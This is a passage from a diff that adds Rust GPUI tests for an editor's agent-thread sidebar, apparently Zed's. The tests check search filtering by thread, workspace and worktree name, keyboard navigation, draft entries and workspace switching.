+ multi_workspace.update_in(cx, |mw, window, cx| { + mw.create_test_workspace(window, cx).detach(); + }); + cx.run_until_parked(); + + let project_b = multi_workspace.read_with(cx, |mw, cx| { + mw.workspaces().nth(1).unwrap().read(cx).project().clone() + }); + + for (id, title, hour) in [ + ("b1", "Refactor sidebar layout", 3), + ("b2", "Fix typo in README", 1), + ] { + save_thread_metadata( + acp::SessionId::new(Arc::from(id)), + title.into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, hour, 0, 0).unwrap(), + None, + &project_b, + cx, + ) + } + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [project-a]", + " Fix bug in sidebar", + " Add tests for editor", + ] + ); + + // "sidebar" matches a thread in each workspace — both headers stay visible. + type_in_search(&sidebar, "sidebar", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [project-a]", " Fix bug in sidebar <== selected",] + ); + + // "typo" only matches in the second workspace — the first header disappears. + type_in_search(&sidebar, "typo", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + Vec::::new() + ); + + // "project-a" matches the first workspace name — the header appears + // with all child threads included. 
+ type_in_search(&sidebar, "project-a", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [project-a]", + " Fix bug in sidebar <== selected", + " Add tests for editor", + ] + ); +} + +#[gpui::test] +async fn test_search_matches_workspace_name(cx: &mut TestAppContext) { + let project_a = init_test_project("/alpha-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + for (id, title, hour) in [ + ("a1", "Fix bug in sidebar", 2), + ("a2", "Add tests for editor", 1), + ] { + save_thread_metadata( + acp::SessionId::new(Arc::from(id)), + title.into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, hour, 0, 0).unwrap(), + None, + &project_a, + cx, + ) + } + + // Add a second workspace. + multi_workspace.update_in(cx, |mw, window, cx| { + mw.create_test_workspace(window, cx).detach(); + }); + cx.run_until_parked(); + + let project_b = multi_workspace.read_with(cx, |mw, cx| { + mw.workspaces().nth(1).unwrap().read(cx).project().clone() + }); + + for (id, title, hour) in [ + ("b1", "Refactor sidebar layout", 3), + ("b2", "Fix typo in README", 1), + ] { + save_thread_metadata( + acp::SessionId::new(Arc::from(id)), + title.into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, hour, 0, 0).unwrap(), + None, + &project_b, + cx, + ) + } + cx.run_until_parked(); + + // "alpha" matches the workspace name "alpha-project" but no thread titles. + // The workspace header should appear with all child threads included. + type_in_search(&sidebar, "alpha", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [alpha-project]", + " Fix bug in sidebar <== selected", + " Add tests for editor", + ] + ); + + // "sidebar" matches thread titles in both workspaces but not workspace names. + // Both headers appear with their matching threads. 
+ type_in_search(&sidebar, "sidebar", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [alpha-project]", " Fix bug in sidebar <== selected",] + ); + + // "alpha sidebar" matches the workspace name "alpha-project" (fuzzy: a-l-p-h-a-s-i-d-e-b-a-r + // doesn't match) — but does not match either workspace name or any thread. + // Actually let's test something simpler: a query that matches both a workspace + // name AND some threads in that workspace. Matching threads should still appear. + type_in_search(&sidebar, "fix", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [alpha-project]", " Fix bug in sidebar <== selected",] + ); + + // A query that matches a workspace name AND a thread in that same workspace. + // Both the header (highlighted) and all child threads should appear. + type_in_search(&sidebar, "alpha", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [alpha-project]", + " Fix bug in sidebar <== selected", + " Add tests for editor", + ] + ); + + // Now search for something that matches only a workspace name when there + // are also threads with matching titles — the non-matching workspace's + // threads should still appear if their titles match. + type_in_search(&sidebar, "alp", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [alpha-project]", + " Fix bug in sidebar <== selected", + " Add tests for editor", + ] + ); +} + +#[gpui::test] +async fn test_search_finds_threads_hidden_behind_view_more(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + // Create 8 threads. The oldest one has a unique name and will be + // behind View More (only 5 shown by default). 
+ for i in 0..8u32 { + let title = if i == 0 { + "Hidden gem thread".to_string() + } else { + format!("Thread {}", i + 1) + }; + save_thread_metadata( + acp::SessionId::new(Arc::from(format!("thread-{}", i))), + title.into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, i).unwrap(), + None, + &project, + cx, + ) + } + cx.run_until_parked(); + + // Confirm the thread is not visible and View More is shown. + let entries = visible_entries_as_strings(&sidebar, cx); + assert!( + entries.iter().any(|e| e.contains("View More")), + "should have View More button" + ); + assert!( + !entries.iter().any(|e| e.contains("Hidden gem")), + "Hidden gem should be behind View More" + ); + + // User searches for the hidden thread — it appears, and View More is gone. + type_in_search(&sidebar, "hidden gem", cx); + let filtered = visible_entries_as_strings(&sidebar, cx); + assert_eq!( + filtered, + vec!["v [my-project]", " Hidden gem thread <== selected",] + ); + assert!( + !filtered.iter().any(|e| e.contains("View More")), + "View More should not appear when filtering" + ); +} + +#[gpui::test] +async fn test_search_finds_threads_inside_collapsed_groups(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_thread_metadata( + acp::SessionId::new(Arc::from("thread-1")), + "Important thread".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, 0).unwrap(), + None, + &project, + cx, + ); + cx.run_until_parked(); + + // User focuses the sidebar and collapses the group using keyboard: + // manually select the header, then press SelectParent to collapse. 
+ focus_sidebar(&sidebar, cx); + sidebar.update_in(cx, |sidebar, _window, _cx| { + sidebar.selection = Some(0); + }); + cx.dispatch_action(SelectParent); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["> [my-project] <== selected"] + ); + + // User types a search — the thread appears even though its group is collapsed. + type_in_search(&sidebar, "important", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["> [my-project]", " Important thread <== selected",] + ); +} + +#[gpui::test] +async fn test_search_then_keyboard_navigate_and_confirm(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + for (id, title, hour) in [ + ("t-1", "Fix crash in panel", 3), + ("t-2", "Fix lint warnings", 2), + ("t-3", "Add new feature", 1), + ] { + save_thread_metadata( + acp::SessionId::new(Arc::from(id)), + title.into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, hour, 0, 0).unwrap(), + None, + &project, + cx, + ) + } + cx.run_until_parked(); + + focus_sidebar(&sidebar, cx); + + // User types "fix" — two threads match. + type_in_search(&sidebar, "fix", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [my-project]", + " Fix crash in panel <== selected", + " Fix lint warnings", + ] + ); + + // Selection starts on the first matching thread. User presses + // SelectNext to move to the second match. + cx.dispatch_action(SelectNext); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [my-project]", + " Fix crash in panel", + " Fix lint warnings <== selected", + ] + ); + + // User can also jump back with SelectPrevious. 
+ cx.dispatch_action(SelectPrevious); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [my-project]", + " Fix crash in panel <== selected", + " Fix lint warnings", + ] + ); +} + +#[gpui::test] +async fn test_confirm_on_historical_thread_activates_workspace(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + multi_workspace.update_in(cx, |mw, window, cx| { + mw.create_test_workspace(window, cx).detach(); + }); + cx.run_until_parked(); + + let (workspace_0, workspace_1) = multi_workspace.read_with(cx, |mw, _| { + ( + mw.workspaces().next().unwrap().clone(), + mw.workspaces().nth(1).unwrap().clone(), + ) + }); + + save_thread_metadata( + acp::SessionId::new(Arc::from("hist-1")), + "Historical Thread".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 6, 1, 0, 0, 0).unwrap(), + None, + &project, + cx, + ); + cx.run_until_parked(); + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Historical Thread",] + ); + + // Switch to workspace 1 so we can verify the confirm switches back. + multi_workspace.update_in(cx, |mw, window, cx| { + let workspace = mw.workspaces().nth(1).unwrap().clone(); + mw.activate(workspace, window, cx); + }); + cx.run_until_parked(); + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()), + workspace_1 + ); + + // Confirm on the historical (non-live) thread at index 1. + // Before a previous fix, the workspace field was Option and + // historical threads had None, so activate_thread early-returned + // without switching the workspace. 
+ sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.selection = Some(1); + sidebar.confirm(&Confirm, window, cx); + }); + cx.run_until_parked(); + + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()), + workspace_0 + ); +} + +#[gpui::test] +async fn test_click_clears_selection_and_focus_in_restores_it(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_thread_metadata( + acp::SessionId::new(Arc::from("t-1")), + "Thread A".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 2, 0, 0, 0).unwrap(), + None, + &project, + cx, + ); + + save_thread_metadata( + acp::SessionId::new(Arc::from("t-2")), + "Thread B".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, 0).unwrap(), + None, + &project, + cx, + ); + + cx.run_until_parked(); + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Thread A", " Thread B",] + ); + + // Keyboard confirm preserves selection. + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.selection = Some(1); + sidebar.confirm(&Confirm, window, cx); + }); + assert_eq!( + sidebar.read_with(cx, |sidebar, _| sidebar.selection), + Some(1) + ); + + // Click handlers clear selection to None so no highlight lingers + // after a click regardless of focus state. The hover style provides + // visual feedback during mouse interaction instead. 
+ sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.selection = None; + let path_list = PathList::new(&[std::path::PathBuf::from("/my-project")]); + sidebar.toggle_collapse(&path_list, window, cx); + }); + assert_eq!(sidebar.read_with(cx, |sidebar, _| sidebar.selection), None); + + // When the user tabs back into the sidebar, focus_in no longer + // restores selection — it stays None. + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.focus_in(window, cx); + }); + assert_eq!(sidebar.read_with(cx, |sidebar, _| sidebar.selection), None); +} + +#[gpui::test] +async fn test_thread_title_update_propagates_to_sidebar(cx: &mut TestAppContext) { + let project = init_test_project_with_agent_panel("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let (sidebar, panel) = setup_sidebar_with_agent_panel(&multi_workspace, cx); + + let connection = StubAgentConnection::new(); + connection.set_next_prompt_updates(vec![acp::SessionUpdate::AgentMessageChunk( + acp::ContentChunk::new("Hi there!".into()), + )]); + open_thread_with_connection(&panel, connection, cx); + send_message(&panel, cx); + + let session_id = active_session_id(&panel, cx); + save_test_thread_metadata(&session_id, &project, cx).await; + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Hello *"] + ); + + // Simulate the agent generating a title. The notification chain is: + // AcpThread::set_title emits TitleUpdated → + // ConnectionView::handle_thread_event calls cx.notify() → + // AgentPanel observer fires and emits AgentPanelEvent → + // Sidebar subscription calls update_entries / rebuild_contents. + // + // Before the fix, handle_thread_event did NOT call cx.notify() for + // TitleUpdated, so the AgentPanel observer never fired and the + // sidebar kept showing the old title. 
+ let thread = panel.read_with(cx, |panel, cx| panel.active_agent_thread(cx).unwrap()); + thread.update(cx, |thread, cx| { + thread + .set_title("Friendly Greeting with AI".into(), cx) + .detach(); + }); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Friendly Greeting with AI *"] + ); +} + +#[gpui::test] +async fn test_focused_thread_tracks_user_intent(cx: &mut TestAppContext) { + let project_a = init_test_project_with_agent_panel("/project-a", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a.clone(), window, cx)); + let (sidebar, panel_a) = setup_sidebar_with_agent_panel(&multi_workspace, cx); + + // Save a thread so it appears in the list. + let connection_a = StubAgentConnection::new(); + connection_a.set_next_prompt_updates(vec![acp::SessionUpdate::AgentMessageChunk( + acp::ContentChunk::new("Done".into()), + )]); + open_thread_with_connection(&panel_a, connection_a, cx); + send_message(&panel_a, cx); + let session_id_a = active_session_id(&panel_a, cx); + save_test_thread_metadata(&session_id_a, &project_a, cx).await; + + // Add a second workspace with its own agent panel. + let fs = cx.update(|_, cx| ::global(cx)); + fs.as_fake() + .insert_tree("/project-b", serde_json::json!({ "src": {} })) + .await; + let project_b = project::Project::test(fs, ["/project-b".as_ref()], cx).await; + let workspace_b = multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(project_b.clone(), window, cx) + }); + let panel_b = add_agent_panel(&workspace_b, cx); + cx.run_until_parked(); + + let workspace_a = + multi_workspace.read_with(cx, |mw, _cx| mw.workspaces().next().unwrap().clone()); + + // ── 1. 
Initial state: focused thread derived from active panel ───── + sidebar.read_with(cx, |sidebar, _cx| { + assert_active_thread( + sidebar, + &session_id_a, + "The active panel's thread should be focused on startup", + ); + }); + + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.activate_thread( + ThreadMetadata { + session_id: session_id_a.clone(), + agent_id: agent::ZED_AGENT_ID.clone(), + title: "Test".into(), + updated_at: Utc::now(), + created_at: None, + folder_paths: PathList::default(), + main_worktree_paths: PathList::default(), + archived: false, + }, + &workspace_a, + window, + cx, + ); + }); + cx.run_until_parked(); + + sidebar.read_with(cx, |sidebar, _cx| { + assert_active_thread( + sidebar, + &session_id_a, + "After clicking a thread, it should be the focused thread", + ); + assert!( + has_thread_entry(sidebar, &session_id_a), + "The clicked thread should be present in the entries" + ); + }); + + workspace_a.read_with(cx, |workspace, cx| { + assert!( + workspace.panel::(cx).is_some(), + "Agent panel should exist" + ); + let dock = workspace.right_dock().read(cx); + assert!( + dock.is_open(), + "Clicking a thread should open the agent panel dock" + ); + }); + + let connection_b = StubAgentConnection::new(); + connection_b.set_next_prompt_updates(vec![acp::SessionUpdate::AgentMessageChunk( + acp::ContentChunk::new("Thread B".into()), + )]); + open_thread_with_connection(&panel_b, connection_b, cx); + send_message(&panel_b, cx); + let session_id_b = active_session_id(&panel_b, cx); + save_test_thread_metadata(&session_id_b, &project_b, cx).await; + cx.run_until_parked(); + + // Workspace A is currently active. Click a thread in workspace B, + // which also triggers a workspace switch. 
+ sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.activate_thread( + ThreadMetadata { + session_id: session_id_b.clone(), + agent_id: agent::ZED_AGENT_ID.clone(), + title: "Thread B".into(), + updated_at: Utc::now(), + created_at: None, + folder_paths: PathList::default(), + main_worktree_paths: PathList::default(), + archived: false, + }, + &workspace_b, + window, + cx, + ); + }); + cx.run_until_parked(); + + sidebar.read_with(cx, |sidebar, _cx| { + assert_active_thread( + sidebar, + &session_id_b, + "Clicking a thread in another workspace should focus that thread", + ); + assert!( + has_thread_entry(sidebar, &session_id_b), + "The cross-workspace thread should be present in the entries" + ); + }); + + multi_workspace.update_in(cx, |mw, window, cx| { + let workspace = mw.workspaces().next().unwrap().clone(); + mw.activate(workspace, window, cx); + }); + cx.run_until_parked(); + + sidebar.read_with(cx, |sidebar, _cx| { + assert_active_thread( + sidebar, + &session_id_a, + "Switching workspace should seed focused_thread from the new active panel", + ); + assert!( + has_thread_entry(sidebar, &session_id_a), + "The seeded thread should be present in the entries" + ); + }); + + let connection_b2 = StubAgentConnection::new(); + connection_b2.set_next_prompt_updates(vec![acp::SessionUpdate::AgentMessageChunk( + acp::ContentChunk::new(DEFAULT_THREAD_TITLE.into()), + )]); + open_thread_with_connection(&panel_b, connection_b2, cx); + send_message(&panel_b, cx); + let session_id_b2 = active_session_id(&panel_b, cx); + save_test_thread_metadata(&session_id_b2, &project_b, cx).await; + cx.run_until_parked(); + + // Panel B is not the active workspace's panel (workspace A is + // active), so opening a thread there should not change focused_thread. + // This prevents running threads in background workspaces from causing + // the selection highlight to jump around. 
+ sidebar.read_with(cx, |sidebar, _cx| { + assert_active_thread( + sidebar, + &session_id_a, + "Opening a thread in a non-active panel should not change focused_thread", + ); + }); + + workspace_b.update_in(cx, |workspace, window, cx| { + workspace.focus_handle(cx).focus(window, cx); + }); + cx.run_until_parked(); + + sidebar.read_with(cx, |sidebar, _cx| { + assert_active_thread( + sidebar, + &session_id_a, + "Defocusing the sidebar should not change focused_thread", + ); + }); + + // Switching workspaces via the multi_workspace (simulates clicking + // a workspace header) should clear focused_thread. + multi_workspace.update_in(cx, |mw, window, cx| { + let workspace = mw.workspaces().find(|w| *w == &workspace_b).cloned(); + if let Some(workspace) = workspace { + mw.activate(workspace, window, cx); + } + }); + cx.run_until_parked(); + + sidebar.read_with(cx, |sidebar, _cx| { + assert_active_thread( + sidebar, + &session_id_b2, + "Switching workspace should seed focused_thread from the new active panel", + ); + assert!( + has_thread_entry(sidebar, &session_id_b2), + "The seeded thread should be present in the entries" + ); + }); + + // ── 8. Focusing the agent panel thread keeps focused_thread ──── + // Workspace B still has session_id_b2 loaded in the agent panel. + // Clicking into the thread (simulated by focusing its view) should + // keep focused_thread since it was already seeded on workspace switch. 
+ panel_b.update_in(cx, |panel, window, cx| { + if let Some(thread_view) = panel.active_conversation_view() { + thread_view.read(cx).focus_handle(cx).focus(window, cx); + } + }); + cx.run_until_parked(); + + sidebar.read_with(cx, |sidebar, _cx| { + assert_active_thread( + sidebar, + &session_id_b2, + "Focusing the agent panel thread should set focused_thread", + ); + assert!( + has_thread_entry(sidebar, &session_id_b2), + "The focused thread should be present in the entries" + ); + }); +} + +#[gpui::test] +async fn test_new_thread_button_works_after_adding_folder(cx: &mut TestAppContext) { + let project = init_test_project_with_agent_panel("/project-a", cx).await; + let fs = cx.update(|cx| ::global(cx)); + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let (sidebar, panel) = setup_sidebar_with_agent_panel(&multi_workspace, cx); + + // Start a thread and send a message so it has history. + let connection = StubAgentConnection::new(); + connection.set_next_prompt_updates(vec![acp::SessionUpdate::AgentMessageChunk( + acp::ContentChunk::new("Done".into()), + )]); + open_thread_with_connection(&panel, connection, cx); + send_message(&panel, cx); + let session_id = active_session_id(&panel, cx); + save_test_thread_metadata(&session_id, &project, cx).await; + cx.run_until_parked(); + + // Verify the thread appears in the sidebar. + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [project-a]", " Hello *",] + ); + + // The "New Thread" button should NOT be in "active/draft" state + // because the panel has a thread with messages. + sidebar.read_with(cx, |sidebar, _cx| { + assert!( + matches!(&sidebar.active_entry, Some(ActiveEntry::Thread { .. })), + "Panel has a thread with messages, so active_entry should be Thread, got {:?}", + sidebar.active_entry, + ); + }); + + // Now add a second folder to the workspace, changing the path_list. 
+ fs.as_fake() + .insert_tree("/project-b", serde_json::json!({ "src": {} })) + .await; + project + .update(cx, |project, cx| { + project.find_or_create_worktree("/project-b", true, cx) + }) + .await + .expect("should add worktree"); + cx.run_until_parked(); + + // The workspace path_list is now [project-a, project-b]. The active + // thread's metadata was re-saved with the new paths by the agent panel's + // project subscription, so it stays visible under the updated group. + // The old [project-a] group persists in the sidebar (empty) because + // project_group_keys is append-only. + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [project-a, project-b]", // + " Hello *", + "v [project-a]", + ] + ); + + // The "New Thread" button must still be clickable (not stuck in + // "active/draft" state). Verify that `active_thread_is_draft` is + // false — the panel still has the old thread with messages. + sidebar.read_with(cx, |sidebar, _cx| { + assert!( + matches!(&sidebar.active_entry, Some(ActiveEntry::Thread { .. })), + "After adding a folder the panel still has a thread with messages, \ + so active_entry should be Thread, got {:?}", + sidebar.active_entry, + ); + }); + + // Actually click "New Thread" by calling create_new_thread and + // verify a new draft is created. + let workspace = multi_workspace.read_with(cx, |mw, _cx| mw.workspace().clone()); + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.create_new_thread(&workspace, window, cx); + }); + cx.run_until_parked(); + + // After creating a new thread, the panel should now be in draft + // state (no messages on the new thread). 
+ sidebar.read_with(cx, |sidebar, _cx| { + assert_active_draft( + sidebar, + &workspace, + "After creating a new thread active_entry should be Draft", + ); + }); +} + +#[gpui::test] +async fn test_cmd_n_shows_new_thread_entry(cx: &mut TestAppContext) { + // When the user presses Cmd-N (NewThread action) while viewing a + // non-empty thread, the sidebar should show the "New Thread" entry. + // This exercises the same code path as the workspace action handler + // (which bypasses the sidebar's create_new_thread method). + let project = init_test_project_with_agent_panel("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let (sidebar, panel) = setup_sidebar_with_agent_panel(&multi_workspace, cx); + + // Create a non-empty thread (has messages). + let connection = StubAgentConnection::new(); + connection.set_next_prompt_updates(vec![acp::SessionUpdate::AgentMessageChunk( + acp::ContentChunk::new("Done".into()), + )]); + open_thread_with_connection(&panel, connection, cx); + send_message(&panel, cx); + + let session_id = active_session_id(&panel, cx); + save_test_thread_metadata(&session_id, &project, cx).await; + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Hello *"] + ); + + // Simulate cmd-n + let workspace = multi_workspace.read_with(cx, |mw, _cx| mw.workspace().clone()); + panel.update_in(cx, |panel, window, cx| { + panel.new_thread(&NewThread, window, cx); + }); + workspace.update_in(cx, |workspace, window, cx| { + workspace.focus_panel::(window, cx); + }); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " [~ Draft]", " Hello *"], + "After Cmd-N the sidebar should show a highlighted Draft entry" + ); + + sidebar.read_with(cx, |sidebar, _cx| { + assert_active_draft( + sidebar, + &workspace, + "active_entry should be Draft after Cmd-N", + ); + 
}); +} + +#[gpui::test] +async fn test_draft_with_server_session_shows_as_draft(cx: &mut TestAppContext) { + let project = init_test_project_with_agent_panel("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let (sidebar, panel) = setup_sidebar_with_agent_panel(&multi_workspace, cx); + + // Create a saved thread so the workspace has history. + let connection = StubAgentConnection::new(); + connection.set_next_prompt_updates(vec![acp::SessionUpdate::AgentMessageChunk( + acp::ContentChunk::new("Done".into()), + )]); + open_thread_with_connection(&panel, connection, cx); + send_message(&panel, cx); + let saved_session_id = active_session_id(&panel, cx); + save_test_thread_metadata(&saved_session_id, &project, cx).await; + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Hello *"] + ); + + // Open a new draft thread via a server connection. This gives the + // conversation a parent_id (session assigned by the server) but + // no messages have been sent, so active_thread_is_draft() is true. + let draft_connection = StubAgentConnection::new(); + open_thread_with_connection(&panel, draft_connection, cx); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " [~ Draft]", " Hello *"], + ); + + let workspace = multi_workspace.read_with(cx, |mw, _cx| mw.workspace().clone()); + sidebar.read_with(cx, |sidebar, _cx| { + assert_active_draft( + sidebar, + &workspace, + "Draft with server session should be Draft, not Thread", + ); + }); +} + +#[gpui::test] +async fn test_cmd_n_shows_new_thread_entry_in_absorbed_worktree(cx: &mut TestAppContext) { + // When the active workspace is an absorbed git worktree, cmd-n + // should still show the "New Thread" entry under the main repo's + // header and highlight it as active. 
+ agent_ui::test_support::init_test(cx); + cx.update(|cx| { + cx.update_flags(false, vec!["agent-v2".into()]); + ThreadStore::init_global(cx); + ThreadMetadataStore::init_global(cx); + language_model::LanguageModelRegistry::test(cx); + prompt_store::init(cx); + }); + + let fs = FakeFs::new(cx.executor()); + + // Main repo with a linked worktree. + fs.insert_tree( + "/project", + serde_json::json!({ + ".git": {}, + "src": {}, + }), + ) + .await; + + // Worktree checkout pointing back to the main repo. + fs.add_linked_worktree_for_repo( + Path::new("/project/.git"), + false, + git::repository::Worktree { + path: std::path::PathBuf::from("/wt-feature-a"), + ref_name: Some("refs/heads/feature-a".into()), + sha: "aaa".into(), + is_main: false, + }, + ) + .await; + + cx.update(|cx| ::set_global(fs.clone(), cx)); + + let main_project = project::Project::test(fs.clone(), ["/project".as_ref()], cx).await; + let worktree_project = project::Project::test(fs.clone(), ["/wt-feature-a".as_ref()], cx).await; + + main_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + worktree_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(main_project.clone(), window, cx)); + + let sidebar = setup_sidebar(&multi_workspace, cx); + + let worktree_workspace = multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(worktree_project.clone(), window, cx) + }); + + let worktree_panel = add_agent_panel(&worktree_workspace, cx); + + // Switch to the worktree workspace. + multi_workspace.update_in(cx, |mw, window, cx| { + let workspace = mw.workspaces().nth(1).unwrap().clone(); + mw.activate(workspace, window, cx); + }); + + // Create a non-empty thread in the worktree workspace. 
+ let connection = StubAgentConnection::new(); + connection.set_next_prompt_updates(vec![acp::SessionUpdate::AgentMessageChunk( + acp::ContentChunk::new("Done".into()), + )]); + open_thread_with_connection(&worktree_panel, connection, cx); + send_message(&worktree_panel, cx); + + let session_id = active_session_id(&worktree_panel, cx); + save_test_thread_metadata(&session_id, &worktree_project, cx).await; + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [project]", " Hello {wt-feature-a} *"] + ); + + // Simulate Cmd-N in the worktree workspace. + worktree_panel.update_in(cx, |panel, window, cx| { + panel.new_thread(&NewThread, window, cx); + }); + worktree_workspace.update_in(cx, |workspace, window, cx| { + workspace.focus_panel::(window, cx); + }); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [project]", + " [~ Draft {wt-feature-a}]", + " Hello {wt-feature-a} *" + ], + "After Cmd-N in an absorbed worktree, the sidebar should show \ + a highlighted Draft entry under the main repo header" + ); + + sidebar.read_with(cx, |sidebar, _cx| { + assert_active_draft( + sidebar, + &worktree_workspace, + "active_entry should be Draft after Cmd-N", + ); + }); +} + +async fn init_test_project_with_git( + worktree_path: &str, + cx: &mut TestAppContext, +) -> (Entity, Arc) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + worktree_path, + serde_json::json!({ + ".git": {}, + "src": {}, + }), + ) + .await; + cx.update(|cx| ::set_global(fs.clone(), cx)); + let project = project::Project::test(fs.clone(), [worktree_path.as_ref()], cx).await; + (project, fs) +} + +#[gpui::test] +async fn test_search_matches_worktree_name(cx: &mut TestAppContext) { + let (project, fs) = init_test_project_with_git("/project", cx).await; + + fs.as_fake() + .add_linked_worktree_for_repo( + Path::new("/project/.git"), + false, + git::repository::Worktree { + path: 
std::path::PathBuf::from("/wt/rosewood"), + ref_name: Some("refs/heads/rosewood".into()), + sha: "abc".into(), + is_main: false, + }, + ) + .await; + + project + .update(cx, |project, cx| project.git_scans_complete(cx)) + .await; + + let worktree_project = project::Project::test(fs.clone(), ["/wt/rosewood".as_ref()], cx).await; + worktree_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_named_thread_metadata("main-t", "Unrelated Thread", &project, cx).await; + save_named_thread_metadata("wt-t", "Fix Bug", &worktree_project, cx).await; + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // Search for "rosewood" — should match the worktree name, not the title. + type_in_search(&sidebar, "rosewood", cx); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [project]", " Fix Bug {rosewood} <== selected"], + ); +} + +#[gpui::test] +async fn test_git_worktree_added_live_updates_sidebar(cx: &mut TestAppContext) { + let (project, fs) = init_test_project_with_git("/project", cx).await; + + project + .update(cx, |project, cx| project.git_scans_complete(cx)) + .await; + + let worktree_project = project::Project::test(fs.clone(), ["/wt/rosewood".as_ref()], cx).await; + worktree_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + let 